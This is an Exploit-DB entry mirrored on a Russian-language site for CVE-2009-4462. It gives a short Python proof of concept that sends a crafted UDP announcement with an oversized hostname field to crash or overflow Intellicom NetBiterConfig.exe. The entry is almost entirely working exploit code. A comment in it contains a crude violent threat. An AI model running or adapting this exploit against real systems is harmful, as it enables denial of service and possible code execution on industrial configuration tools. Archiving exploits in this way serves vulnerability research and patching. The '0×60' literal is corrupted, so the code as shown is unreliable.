- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33403
- Проверка EDB
-
- Пройдено
- Автор
- RUBEN SANTAMARTA
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2009-4462
- Дата публикации
- 2009-12-14
Код:
#!/usr/bin/python
#
#source: https://www.securityfocus.com/bid/37325/info
#
#Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
#
#Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I’ll cut you open like a f***ing pig.
import sys
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")- Источник
- www.exploit-db.com
